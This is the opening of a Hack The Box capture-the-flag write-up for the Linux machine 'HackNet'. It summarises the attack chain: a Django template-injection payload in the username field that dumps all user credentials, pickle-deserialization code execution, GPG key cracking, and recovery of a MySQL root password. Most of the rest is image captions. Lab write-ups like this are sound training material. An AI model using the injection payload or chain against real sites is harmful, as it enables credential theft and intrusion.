HackNet

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Linux (Debian)

Date: 2025-11-06

Author: x4cc3

Executive Summary

HackNet is a Medium Linux machine running a Django social network. An SSTI vulnerability in the username field dumps all user credentials via {{ users.values }}. SSH access as mikey reveals Django cache files vulnerable to pickle deserialization RCE, leading to sandy. A GPG private key is cracked to decrypt database backups containing the MySQL root password.

Recon — Port Scan

Port Service
22/tcp SSH
80/tcp HTTP — Django app

Landing page

Landing page

Registration page

Registration page

Dashboard after login

Dashboard after login

Exploitation

Django SSTI via Username

SSTI username change

SSTI username change

Explore page with likes

Explore page with likes

SSTI source code showing user dump

SSTI source code showing user dump